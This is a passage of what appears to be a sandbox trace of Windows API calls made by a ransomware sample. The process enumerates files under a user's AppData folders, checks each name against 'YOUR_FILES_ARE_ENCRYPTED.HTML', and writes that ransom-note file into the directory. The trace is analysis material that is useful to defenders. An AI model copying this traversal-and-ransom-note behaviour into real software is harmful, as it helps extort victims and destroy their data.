FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x16d42383, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0x16d42383, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x189de896, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x45abc, dwReserved0=0x3187a00, dwReserved1=0x6f5ce0, cFileName="7eba64f56aad18c10e357973056c3caf6ef35fb7f7100d252c77f5fd6e020b0b", cAlternateFileName="7EBA64~1")) returned 1 [0118.782] StrStrIW (lpFirst="7eba64f56aad18c10e357973056c3caf6ef35fb7f7100d252c77f5fd6e020b0b", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0118.782] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\7eba64f56aad18c10e357973056c3caf6ef35fb7f7100d252c77f5fd6e020b0b") returned 186 [0118.782] PathFindExtensionW (pszPath="7eba64f56aad18c10e357973056c3caf6ef35fb7f7100d252c77f5fd6e020b0b") returned="" [0118.782] lstrlenW (lpString="") returned 0 [0118.782] PathFindExtensionW (pszPath="7eba64f56aad18c10e357973056c3caf6ef35fb7f7100d252c77f5fd6e020b0b") returned="" [0118.782] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x16e999f7, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0x16e999f7, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x189de896, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x5c2b, dwReserved0=0x3187a00, dwReserved1=0x6f5ce0, cFileName="a1326e26a9c75c2fad448d7456cf554d9d5972e95ca085fc3b1758b94f8b3c3a", cAlternateFileName="A1326E~1")) returned 1 [0118.782] StrStrIW (lpFirst="a1326e26a9c75c2fad448d7456cf554d9d5972e95ca085fc3b1758b94f8b3c3a", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0118.782] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\a1326e26a9c75c2fad448d7456cf554d9d5972e95ca085fc3b1758b94f8b3c3a") returned 186 [0118.782] PathFindExtensionW (pszPath="a1326e26a9c75c2fad448d7456cf554d9d5972e95ca085fc3b1758b94f8b3c3a") returned="" [0118.782] lstrlenW (lpString="") returned 0 [0118.782] PathFindExtensionW (pszPath="a1326e26a9c75c2fad448d7456cf554d9d5972e95ca085fc3b1758b94f8b3c3a") returned="" [0118.782] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x76eea7aa, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x76eea7aa, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x7af9631d, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x3ea, dwReserved0=0x3187a00, dwReserved1=0x6f5ce0, cFileName="b71dabef83821ac1436c6e54eed36510be63ff7e106437b4f3d5fa2b5880d0ea", cAlternateFileName="B71DAB~1")) returned 1 [0118.782] StrStrIW (lpFirst="b71dabef83821ac1436c6e54eed36510be63ff7e106437b4f3d5fa2b5880d0ea", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0118.782] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\b71dabef83821ac1436c6e54eed36510be63ff7e106437b4f3d5fa2b5880d0ea") returned 186 [0118.782] PathFindExtensionW (pszPath="b71dabef83821ac1436c6e54eed36510be63ff7e106437b4f3d5fa2b5880d0ea") returned="" [0118.782] lstrlenW (lpString="") returned 0 [0118.782] PathFindExtensionW (pszPath="b71dabef83821ac1436c6e54eed36510be63ff7e106437b4f3d5fa2b5880d0ea") returned="" [0118.782] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x76f36cad, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x76f36cad, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x7af9631d, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x1736, dwReserved0=0x3187a00, dwReserved1=0x6f5ce0, cFileName="be98ffca3056276ead4f2650d3e81096031e3b87ef1da0c6573ae133cd6e9c90", cAlternateFileName="BE98FF~1")) returned 1 [0118.782] StrStrIW (lpFirst="be98ffca3056276ead4f2650d3e81096031e3b87ef1da0c6573ae133cd6e9c90", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0118.783] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\be98ffca3056276ead4f2650d3e81096031e3b87ef1da0c6573ae133cd6e9c90") returned 186 [0118.783] PathFindExtensionW (pszPath="be98ffca3056276ead4f2650d3e81096031e3b87ef1da0c6573ae133cd6e9c90") returned="" [0118.783] lstrlenW (lpString="") returned 0 [0118.783] PathFindExtensionW (pszPath="be98ffca3056276ead4f2650d3e81096031e3b87ef1da0c6573ae133cd6e9c90") returned="" [0118.783] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2e481cf2, ftCreationTime.dwHighDateTime=0x1d70a81, ftLastAccessTime.dwLowDateTime=0x2e481cf2, ftLastAccessTime.dwHighDateTime=0x1d70a81, ftLastWriteTime.dwLowDateTime=0x2f10bb98, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x99a1e, dwReserved0=0x3187a00, dwReserved1=0x6f5ce0, cFileName="c1bc2a316cfea92c6beeedc8fde1f840991251294463be01d2a9dc862d4e0b3e", cAlternateFileName="C1BC2A~1")) returned 1 [0118.783] StrStrIW (lpFirst="c1bc2a316cfea92c6beeedc8fde1f840991251294463be01d2a9dc862d4e0b3e", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0118.783] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\c1bc2a316cfea92c6beeedc8fde1f840991251294463be01d2a9dc862d4e0b3e") returned 186 [0118.783] PathFindExtensionW (pszPath="c1bc2a316cfea92c6beeedc8fde1f840991251294463be01d2a9dc862d4e0b3e") returned="" [0118.783] lstrlenW (lpString="") returned 0 [0118.783] PathFindExtensionW (pszPath="c1bc2a316cfea92c6beeedc8fde1f840991251294463be01d2a9dc862d4e0b3e") returned="" [0118.783] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1b587918, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0x1b587918, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x1bd6d6ca, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x8af46, dwReserved0=0x3187a00, dwReserved1=0x6f5ce0, cFileName="c20a563add1da520b325d5e8931c544186b28de2119ed5fc89f1574be77a3785", cAlternateFileName="C20A56~1")) returned 1 [0118.783] StrStrIW (lpFirst="c20a563add1da520b325d5e8931c544186b28de2119ed5fc89f1574be77a3785", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0118.783] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\c20a563add1da520b325d5e8931c544186b28de2119ed5fc89f1574be77a3785") returned 186 [0118.783] PathFindExtensionW (pszPath="c20a563add1da520b325d5e8931c544186b28de2119ed5fc89f1574be77a3785") returned="" [0118.783] lstrlenW (lpString="") returned 0 [0118.783] PathFindExtensionW (pszPath="c20a563add1da520b325d5e8931c544186b28de2119ed5fc89f1574be77a3785") returned="" [0118.783] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x286eb60c, ftCreationTime.dwHighDateTime=0x1d70a81, ftLastAccessTime.dwLowDateTime=0x286eb60c, ftLastAccessTime.dwHighDateTime=0x1d70a81, ftLastWriteTime.dwLowDateTime=0x28edcc06, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x3ca0, dwReserved0=0x3187a00, dwReserved1=0x6f5ce0, cFileName="c35c5eef07eec7d3a8b8d53ee86d6b0d68502c8108171f206c183ec953766704", cAlternateFileName="C35C5E~1")) returned 1 [0118.783] StrStrIW (lpFirst="c35c5eef07eec7d3a8b8d53ee86d6b0d68502c8108171f206c183ec953766704", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0118.783] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\c35c5eef07eec7d3a8b8d53ee86d6b0d68502c8108171f206c183ec953766704") returned 186 [0118.783] PathFindExtensionW (pszPath="c35c5eef07eec7d3a8b8d53ee86d6b0d68502c8108171f206c183ec953766704") returned="" [0118.783] lstrlenW (lpString="") returned 0 [0118.783] PathFindExtensionW (pszPath="c35c5eef07eec7d3a8b8d53ee86d6b0d68502c8108171f206c183ec953766704") returned="" [0118.783] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x16ddacdb, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0x16ddacdb, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x189de896, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x4293, dwReserved0=0x3187a00, dwReserved1=0x6f5ce0, cFileName="ce014256b9924bf1ec3c8dfb7fcbf7d586f9e2f90f6b8a92bd78b31eb8125a7c", cAlternateFileName="CE0142~1")) returned 1 [0118.783] StrStrIW (lpFirst="ce014256b9924bf1ec3c8dfb7fcbf7d586f9e2f90f6b8a92bd78b31eb8125a7c", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0118.783] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\ce014256b9924bf1ec3c8dfb7fcbf7d586f9e2f90f6b8a92bd78b31eb8125a7c") returned 186 [0118.783] PathFindExtensionW (pszPath="ce014256b9924bf1ec3c8dfb7fcbf7d586f9e2f90f6b8a92bd78b31eb8125a7c") returned="" [0118.783] lstrlenW (lpString="") returned 0 [0118.783] PathFindExtensionW (pszPath="ce014256b9924bf1ec3c8dfb7fcbf7d586f9e2f90f6b8a92bd78b31eb8125a7c") returned="" [0118.783] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x916682d6, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x916682d6, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x9259b185, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x40a1, dwReserved0=0x3187a00, dwReserved1=0x6f5ce0, cFileName="d027c5cef9dc76de02d35ff5ba3b53e776c0c260af04c923ad7204ea18aeb0b8", cAlternateFileName="D027C5~1")) returned 1 [0118.783] StrStrIW (lpFirst="d027c5cef9dc76de02d35ff5ba3b53e776c0c260af04c923ad7204ea18aeb0b8", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0118.783] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\d027c5cef9dc76de02d35ff5ba3b53e776c0c260af04c923ad7204ea18aeb0b8") returned 186 [0118.783] PathFindExtensionW (pszPath="d027c5cef9dc76de02d35ff5ba3b53e776c0c260af04c923ad7204ea18aeb0b8") returned="" [0118.783] lstrlenW (lpString="") returned 0 [0118.783] PathFindExtensionW (pszPath="d027c5cef9dc76de02d35ff5ba3b53e776c0c260af04c923ad7204ea18aeb0b8") returned="" [0118.783] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x16c5d686, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0x16c5d686, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x189de896, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x33f, dwReserved0=0x3187a00, dwReserved1=0x6f5ce0, cFileName="d6fd9626a9f1a7203e5570760d3b44b59cf06b72d33599f7dee7974ef60354b7", cAlternateFileName="D6FD96~1")) returned 1 [0118.783] StrStrIW (lpFirst="d6fd9626a9f1a7203e5570760d3b44b59cf06b72d33599f7dee7974ef60354b7", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0118.783] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\d6fd9626a9f1a7203e5570760d3b44b59cf06b72d33599f7dee7974ef60354b7") returned 186 [0118.784] PathFindExtensionW (pszPath="d6fd9626a9f1a7203e5570760d3b44b59cf06b72d33599f7dee7974ef60354b7") returned="" [0118.784] lstrlenW (lpString="") returned 0 [0118.784] PathFindExtensionW (pszPath="d6fd9626a9f1a7203e5570760d3b44b59cf06b72d33599f7dee7974ef60354b7") returned="" [0118.784] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1b561887, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0x1b561887, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x1bd6d6ca, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x8b755, dwReserved0=0x3187a00, dwReserved1=0x6f5ce0, cFileName="d9b1cc42d6555e7d87dc3f3c82bbffb16ebccd3e1f7f0e4c61d277939b3b2bdd", cAlternateFileName="D9B1CC~1")) returned 1 [0118.784] StrStrIW (lpFirst="d9b1cc42d6555e7d87dc3f3c82bbffb16ebccd3e1f7f0e4c61d277939b3b2bdd", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0118.784] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\d9b1cc42d6555e7d87dc3f3c82bbffb16ebccd3e1f7f0e4c61d277939b3b2bdd") returned 186 [0118.784] PathFindExtensionW (pszPath="d9b1cc42d6555e7d87dc3f3c82bbffb16ebccd3e1f7f0e4c61d277939b3b2bdd") returned="" [0118.784] lstrlenW (lpString="") returned 0 [0118.784] PathFindExtensionW (pszPath="d9b1cc42d6555e7d87dc3f3c82bbffb16ebccd3e1f7f0e4c61d277939b3b2bdd") returned="" [0118.785] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1b561887, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0x1b561887, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x1bd6d6ca, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x8b755, dwReserved0=0x3187a00, dwReserved1=0x6f5ce0, cFileName="d9b1cc42d6555e7d87dc3f3c82bbffb16ebccd3e1f7f0e4c61d277939b3b2bdd", cAlternateFileName="D9B1CC~1")) returned 0 [0118.785] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0118.785] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 151 [0118.785] GetProcessHeap () returned 0x600000 [0118.785] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0118.785] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\Assets\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windows.contentdeliverymanager_cw5n1h2txyewy\\localstate\\assets\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0118.786] WriteFile (in: hFile=0x32c, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0118.787] CloseHandle (hObject=0x32c) returned 1 [0118.787] GetProcessHeap () returned 0x600000 [0118.787] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0118.787] GetProcessHeap () returned 0x600000 [0118.787] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0118.788] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x728bb373, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x728bb373, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x728bb373, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f5da8, dwReserved1=0x6f5cd8, cFileName="ContentManagementSDK", cAlternateFileName="CONTEN~1")) returned 1 [0118.788] StrStrIW (lpFirst="ContentManagementSDK", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0118.788] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK") returned 135 [0118.788] GetProcessHeap () returned 0x600000 [0118.788] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0118.789] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK" [0118.789] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\*" [0118.789] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x728bb373, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x728bb373, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x728bb373, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3187a00, dwReserved1=0x6f5ce0, cFileName=".", cAlternateFileName="")) returned 0x626638 [0118.789] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x728bb373, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x728bb373, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x728bb373, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3187a00, dwReserved1=0x6f5ce0, cFileName="..", cAlternateFileName="")) returned 1 [0118.789] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x728bb373, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x773af2d3, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x773af2d3, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x3187a00, dwReserved1=0x6f5ce0, cFileName="Creatives", cAlternateFileName="CREATI~1")) returned 1 [0118.789] StrStrIW (lpFirst="Creatives", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0118.789] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives") returned 145 [0118.789] GetProcessHeap () returned 0x600000 [0118.789] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3102fc8 [0118.790] lstrcpyW (in: lpString1=0x3102fc8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives" [0118.790] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\*" [0118.790] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\*", lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x728bb373, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x773af2d3, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x773af2d3, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f09f8, dwReserved1=0x6f08e8, cFileName=".", cAlternateFileName="")) returned 0x626978 [0118.790] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x728bb373, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x773af2d3, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x773af2d3, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f09f8, dwReserved1=0x6f08e8, cFileName="..", cAlternateFileName="")) returned 1 [0118.790] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19db9c | out: lpFindFileData=0x19db9c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x77126bb1, ftCreationTime.dwHighDateTime=0x1d7006c, ftLastAccessTime.dwLowDateTime=0x77126bb1, ftLastAccessTime.dwHighDateTime=0x1d7006c, ftLastWriteTime.dwLowDateTime=0x77126bb1, ftLastWriteTime.dwHighDateTime=0x1d7006c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f09f8, dwReserved1=0x6f08e8, cFileName="202911", cAlternateFileName="")) returned 1 [0118.790] StrStrIW (lpFirst="202911", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0118.790] wnsprintfW (in: pszDest=0x3102fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\\LocalState\\ContentManagementSDK\\Creatives\\202911") 